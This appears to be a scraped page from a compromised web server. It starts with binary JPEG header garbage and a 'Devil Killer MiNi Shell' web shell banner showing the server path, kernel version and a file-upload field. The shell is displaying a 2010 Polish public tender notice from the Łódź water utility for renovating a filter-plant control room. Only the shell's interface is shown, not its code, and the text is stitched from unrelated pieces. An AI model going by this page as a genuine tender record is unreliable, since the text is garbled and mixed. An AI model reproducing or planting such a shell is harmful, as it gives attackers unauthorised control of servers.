JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100716/190063-N-2010.html

<p class="kh_header"><b>Łódź: Remont i modernizacja sterowni w Kalinku na obiekcie Filtrów pospiesznych</b><br>
<b>Numer ogłoszenia: 190063 - 2010; data zamieszczenia: 16.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Sp. z o.o. , ul. Wierzbowa 52, 90-133 Łódź, woj. łódzkie, tel. 042 6778202, 6781879, faks 042 6788761.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i modernizacja sterowni w Kalinku na obiekcie Filtrów pospiesznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wielkość zamówienia - poniżej 4 845 000 euro.
2. W ramach przedmiotu zamówienia należy wykonać :
2.I.  Zakres rzeczowy robót świadczony na rzecz Inwestora 1 - ZWiK Sp. z o.o. :
1.Roboty remontowe Sterowni:
Uwaga - rezygnuje się z wykonania instalacji klimatyzacji. 
	  W związku z powyższym wynagrodzenie za wykonanie przedmiotu umowy nie obejmuje kosztów
                materiałów i wykonania  instalacji klimatyzacji.    
1.1)	Roboty budowlane: 
    1.1) Roboty budowlane: 
        - demontaż sufitu podwieszonego ażurowego,        
        - zerwanie boazerii oraz demontaż obudów grzejników, 
        - zerwanie wykładziny i płytek  PCV wraz z frezowaniem pow. betonowych,
        - wykucie bruzd w posadzce cementowej na ułożenie rur PCV(inst. elektryczne)
           oraz pod dylatację,
       - wykonanie nowoprojektowanego otworu drzwiowego po zdemontowaniu
          i przełożeniu instalacji elektrycznej światłowodowej oraz przewodu zasilającego punkt
          dystrybucyjny,
        - usunięcie starych powłok malarskich ze ścian i sufitów,
        - usunięcie wystających fragmentów parapetów lastrykowych w przęsłach środkowych,
        - demontaż okien wraz z parapetami zewnętrznymi i obróbkami blaszanymi,
        - wykucie otworów w ścianie z cegieł o gr. 25 cm na zaprawie cem.,
        - wykonanie przesklepień otworów w ścianie,
        - wykonanie tynków wewnętrznych kat. III z zaprawy cementowo- wapiennej,
        - docieplenie ściany wewnątrz pomieszczenia z płyt g-k na rusztach metalowych 
          pojedynczych z pokryciem jednostronnym jednowarstwowo, wypełnienie styropianem
          EPS80 grubości 50 mm pod oknami,                              
        - okładziny g-k, pojedyncze na stropach, na rusztach metalowych ( uzupełnienie 
          otworów),
        - osadzenie nakładek PCV na podokienniki,  
        - wyłożenie fragmentu ścian glazurą,
        - wykonanie gładzi gipsowych jednowarstwowych na ścianach  i widocznych 
          fragmentach sufitów,
        - dwukrotne malowanie farbami emulsyjnymi ścian i sufitów wraz
          z ich przygotowaniem i gruntowaniem preparatami np. CERESIT 17
          lub ATLAS UNI GRUNT,
        - wykonanie osłony karniszy OK- 1 szyny do żaluzji pionowych,
        - dostawa i montaż żaluzji pionowych materiałowych na okna,
        - dostawa i montaż okien PCV, rozwierano - uchylne, szklone szybą Antisol,
        - dostawa i montaż drzwi aluminiowych jednoskrzydłowych z przeszkleniem 
           bezpiecznym,
        - dostawa i montaż balustrady schodowej ze stali nierdzewnej,
        - uzupełnienie otworów w stropie żelbetowym betonem B20 po wcześniejszym 
          wykonaniu zbrojenia w tych otworach,
        - wykonanie warstwy wyrównawczej pod posadzki wraz z gruntowaniem podłoży
           preparatami np. Weber  Floor,
        - wykonanie posadzki wraz z cokolikami z płytek gresowych porcellanato szkliwionych
           o wymiarach 30x30 cm gr 10mm.
        - okładzina schodów z płytek gresowych porcellanato szkliwionych antypoślizgowych,
        - rozbiórka elementów blaszanych elewacji ( parapety, ościeża, dolna obróbka ściany),
        - dostarczenie i montaż nowych obróbek blacharskich z blachy powlekanej (parapety,
           ościeża, dolna obróbka ściany),
        - ukształtowanie terenu pod wykuszem ze spadkiem od budynku.
        1.2) Roboty elektryczne:
        - demontaż starej instalacji oświetlenia i gniazd (wraz z rozdzielnią, osprzętem
          i oprawami),
       - demontaż i przełożenie instalacji elektrycznej światłowodowej oraz przewodu
         zasilającego punku dystrybucyjny poza nowoprojektowany otwór drzwiowy,
        - wykonanie i montaż rozdzielni R-6-D i R-7-S wraz z instalacją zasilającą
          i uziemiającą szyn PEN,
        - wykonanie instalacji elektrycznej oświetlenia podstawowego i awaryjnego,
        - wykonanie instalacji elektrycznej gniazd wtykowych i wentylacji,
        - wykonanie instalacji gniazd komputerowych z istniejącej rozdzielni RK,
        - wykonanie instalacji elektrycznej zasilania i sterowania węzła CO,
        - oznaczenie obwodów oświetlenia, gniazd, zabezpieczeń oraz rozdzielni,
        - wykonanie schematu jednokreskowego rozdzielni R-6-D i R-7-S na formacie A4,
          zafoliowanie schematów i zamontowanie w rozdzielniach,
        - próby i badania odbiorcze. 
        Uwaga: W związku z rezygnacją z wykonania instalacji klimatyzacji  wynagrodzenie za wykonanie 
                      przedmiotu umowy nie obejmuje  niżej wymienionych  robót elektrycznych:
	      - wykonania instalacji zasilania agregatu chłodniczego przewodem YDYp 5x2,5 mm2,
        - wykonania dwóch obwodów zasilania przewodem YDYp 3x1,5 mm2 jednostki   
          kasetonowej wewnętrznej  (10 szt.), 
        - wyposażenia rozdzielni R-6-D w aparaturę łączeniową w obwodzie Z04
          (FR304-40A, P304-25-30AC, S304 C16),
        1.3) Roboty instalacyjne:
        - remont instalacji wodno-kanalizacyjnej wraz z armaturą,
        - remont instalacji CO wraz z węzłem cieplnym,
        - próby i badania odbiorcze,

2.II.  Zakres rzeczowy robót świadczony na rzecz Inwestora 2 - Miasta Łodzi UMŁ- wydziału Gospodarki Komunalnej

1. Roboty modernizacyjne Sterowni: 
        1.1) Roboty budowlane: 
        - wykonanie ścianek działowych z płyt gipsowo - włóknowych  np. FARMACELL
          gr.2x12.5 mm ( dwie warstwy obustronnie), na profilach stalowych C-75/0.6
          i U-75/0.6 z wkładką z wełny mineralnej niepalnej gr. 5 cm.
        - wykonanie ścianek działowych z pustaków piano- lub gazobetonowych gr.12 cm,
        - wykonanie schodów żelbetowych beton B20,
        - okładzina schodów z płytek gresowych porcellanato szkliwionych antypoślizgowych,
        - wykonanie tynku wewnętrznego cem.-wap. kat. III,
        - licowanie ścian płytkami typu GRES,
        - wykonanie sufitu podwieszonego kasetonowego 60x60 np. ROCKFON,
        - wykonanie sufitu podwieszonego jednowarstwowego z płyt g-k - płyta do gięcia,
        - malowanie dwukrotnie farbą emulsyjną ścian i stropów z płyt gipsowych,
        - zabezpieczenie antykorozyjne elementów stalowych przegubu mocowania ścianki
          do podciągu,
        - dostawa i montaż  balustrady schodowej ze stali nierdzewnej przy nowo wykonanych
           schodach,
        - dostawa i montaż drzwi stalowych aluminiowych jednoskrzydłowych z przeszkleniem
          bezpiecznym, 
        - wykonanie wentylacji grawitacyjnej tzw. hybrydowej,
        - wykonanie docieplenia  styropianem samogasnącym na zewnątrz ścian (10cm) 
          i stropu (wykusz 15cm),
        - wykonanie tynku cienkowarstwowego zacieranego, średnioziarnistego akrylowego,
        - zabezpieczenie styropianu w wykopie, folią z PCV izolacyjną wodoodporną ,
        - wykonanie opaski z płyt betonowych o wym. 50x50x7 na podsypce piaskowej.
Szczegółowy opis przedmiotu zamówienia określają :
- dokumentacja projektowa opracowana przez ARCHI - TECTOR Biuro Inwestycyjno -  Projektowe s.c. z Łodzi,
  ul. Więckowskiego 43/45 zawierająca:   projekt budowlano wykonawczy przebudowy (modernizacji) pomieszczenia 
  sterowni lokalnej : architektura i konstrukcja, instalacje elektryczne, instalacje wod. -kan i cw, instalacja ogrzewania 
  i  klimatyzacji, 
- specyfikacja techniczna wykonania i odbioru robót budowlanych,
stanowiące załącznik nr 9 do SIWZ.
3. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych technologii i  materiałów  niż 
    podano w dokumentacji projektowej, pod warunkiem zapewnienia parametrów nie gorszych niż określone 
    w  tej dokumentacji, posiadających atesty ITB i PZH.
    W takiej sytuacji Zamawiający wymaga złożenie stosownych dokumentów, uwiarygodniających te technologie
     i materiały . Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora dokumentacji
     projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez 
      Zamawiającego decyzji o odrzuceniu oferty z powodu nierównoważności zaproponowanych zamienników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy Wykonawca  zobowiązany jest zabezpieczyć swą ofertę wadium w  wysokości  8  000 zł . Wadium należy wnieść przed upływem terminu składania ofert.              
2.	Wadium musi obejmować cały okres związania ofertą  i może być wniesione w jednej lub kilku następujących formach :
2.1. w pieniądzu,
2.2. w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo
       - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2.3. w gwarancjach bankowych,
2.4. w gwarancjach ubezpieczeniowych,
2.5. w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt.2 
       ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju 
       Przedsiębiorczości (Dz. U. 2000 nr 109, poz. 1158 z późn. zm.). 
3.	Wadium w pieniądzu zostanie uznane za skutecznie wniesione, jeżeli w wyznaczonym terminie  do składania ofert wpłynie przelewem na konto Zamawiającego tj. Zakładu Wodociągów i Kanalizacji sp. z o.o. w Łodzi, ul. Wierzbowa 52, 90-133 Łódź - GETIN Noble Bank S.A. Oddział  w Łodzi, nr  89 1560 0013 2026 0001 2120 0003 z dopiskiem iż wpłata dotyczy wadium w postępowaniu na Remont i modernizację sterowni w Kalinku. Wadium wnoszone w pieniądzu Zamawiający przechowuje na ww. rachunku bankowym.
Oryginał lub ksero dowodu wniesienia wadium w pieniądzu (przelew) winien być załączony do składanej oferty. W przypadku dołączenia kserokopii dowodu wniesienia wadium (przelew) konieczne jest jej potwierdzenie za zgodność z oryginałem przez wykonawcę.
4.	Gwarancje bankowe, ubezpieczeniowe, poręczenia bankowe lub  udzielone przez podmioty wymienione w punkcie 2.5. niniejszego rozdziału winny być sporządzone zgodnie z obowiązującym prawem oraz wystawione na  Zamawiającego to jest Zakład Wodociągów i Kanalizacji sp. z o.o. w Łodzi, ul. Wierzbowa 52, 90-133 Łódź, a także zawierać zapis mówiący , iż gwarant zobowiązuje się do wypłaty Zamawiającemu pełnej kwoty wadium na jego pierwsze pisemne żądanie w okolicznościach określonych w art. 46 ust. 4a oraz  ust. 5 ustawy - Prawo zamówień publicznych tj. gdy ;
                  4.1 wykonawca  w odpowiedzi na wezwanie Zamawiającego,
                        o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń,
                        o których mowa w art. 25 ust. 1 Pzp lub pełnomocnictw, chyba, że udowodni
                        że wynika to z przyczyn niezależnych po jego stronie.
                  4.2 wykonawca, którego oferta została wybrana :
a.	odmówi podpisania umowy w sprawie niniejszego zamówienia publicznego na warunkach określonych w ofercie,
b.	   zawarcie umowy w sprawie niniejszego zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
5.	Oryginały dokumentów stwierdzających wniesienie wadium w formie niepieniężnej należy załączyć do oferty. Zaleca się by oryginał/y ww. dokumentu/ów był/y załączone do oferty w sposób umożliwiający przekazanie go/ich do depozytu Zamawiającego.
6.	Wadium składane przez wykonawców wspólnie ubiegających się o udzielenie zamówienia może być wniesione przez jednego z wykonawców wchodzących w skład podmiotu wspólnego ale w imieniu wszystkich członków podmiotu wspólnego (wszyscy członkowie wchodzący w skład podmiotu wspólnego powinni być wymienieni) - na zasadach określonych w niniejszym rozdziale. 
7.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a Pzp .
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
9.	Pełnomocnik zamawiającego zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie zapisów pkt.7, jeżeli w wyniku  rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11.	Jeżeli wadium wniesiono w pieniądzu , Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym były one przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli :
      12.1 wykonawca  w odpowiedzi na wezwanie Zamawiającego, o którym
              mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa
              w art. 25 ust. 1 Pzp lub pełnomocnictw, chyba, że udowodni że wynika to z przyczyn
              niezależnych po jego stronie,
      12.2 wykonawca, którego oferta została wybrana :
              a.   odmówi podpisania umowy w sprawie niniejszego zamówienia publicznego na 
  warunkach określonych w ofercie,
                b.   zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
  z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia, o którym mowa w rozdziale VI pkt.2.1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Wykazanie się zrealizowaniem  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie co najmniej :
         a)  2 robót budowlano - instalacyjnych , w których wartość robót instalacyjnych wynosi co najmniej 100 tys. zł,
              o wartości brutto każdej z nich nie mniejszej  niż 300 000,00 zł
          albo
            a) 2 robót budowlanych o wartości brutto każdej z nich nie mniejszej niż 200 000,00 zł
          i
           b) 2 robót  instalacyjnych o wartości brutto każdej z nich nie mniejszej niż 100 000,00 zł
Ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia oraz dokumentów, o których mowa w rozdziale VI pkt.2.1),2.2) i 2.3) SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia, o którym mowa w rozdziale VI pkt.2.1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonywania zamówienia tj dysponowania :
             a) jedną osobą na stanowisko kierownika budowy posiadającą :
uprawnienia w specjalności konstrukcyjno - budowlanej bez ograniczeń , uprawniające do kierowania robotami budowlanymi związanymi z obiektem budowlanym w odniesieniu do architektury obiektu,
             b) jedną osobę na stanowisko kierownika robót instalacyjnych  posiadającą :
uprawnienia w specjalności instalacyjnej bez ograniczeń, uprawniające do kierowania robotami budowlanymi związanymi z obiektem budowlanym takim jak :  instalacje cieplne, wentylacyjne, gazowe, wodociągowe i kanalizacyjne,
              c) jedną osobę na stanowisko kierownika robót elektrycznych posiadającą :
uprawnienia budowlane w specjalności instalacyjnej w zakresie   instalacji elektrycznych bez ograniczeń, uprawniające do kierowania robotami budowlanymi związanymi z obiektem budowlanym takim jak instalacje elektryczne , 
             z zastrzeżeniem niżej wymienionych punktów A, B i C.
            A. Uprawnienia, o których mowa powyżej w pkt.3) powinny być zgodne z ustawą 
                  z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2006, nr 156, poz.1118 ze zm.)
                  oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia
                  2006r. w sprawie samodzielnych funkcji technicznych w budownictwie
                  (Dz. U. z 2006, nr 83, poz. 578 ze zm.).
              B. Dopuszcza się uprawnienia równoważne - dla osoby, która posiada uzyskane 
                   przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, 
                   uprawnienia lub stwierdzenie posiadania przygotowania zawodowego do
                   pełnienia samodzielnych funkcji w budownictwie i zachowała uprawnienia
                   do pełnienia tych funkcji w dotychczasowym zakresie.
               C. W przypadku wykonawców zagranicznych, dopuszcza się równoważne
                    kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a
                    ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień
                    ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych
                    nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, 
                    poz. 394 ze zm.).
             (ocena spełnienia tego warunku dokonana będzie na podstawie złożonych przez  wykonawcę oświadczeń,
              o których mowa poniżej w pkt.2.1) i 2.4).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia, o którym mowa w rozdziale VI pkt.2.1) SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień umowy , które wymagają formy pisemnej - aneksu do umowy w sytuacjach i na warunkach , określonych w § 14 ust. 2 i ust. 3  załącznika nr 8 do SIWZ (wzór umowy).
Dopuszcza się również zmianę postanowień umowy bez konieczności sporządzania aneksu do umowy w sytuacjach, o których mowa w § 12 ust. 5 załącznika nr 8 do SIWZ (wzór umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
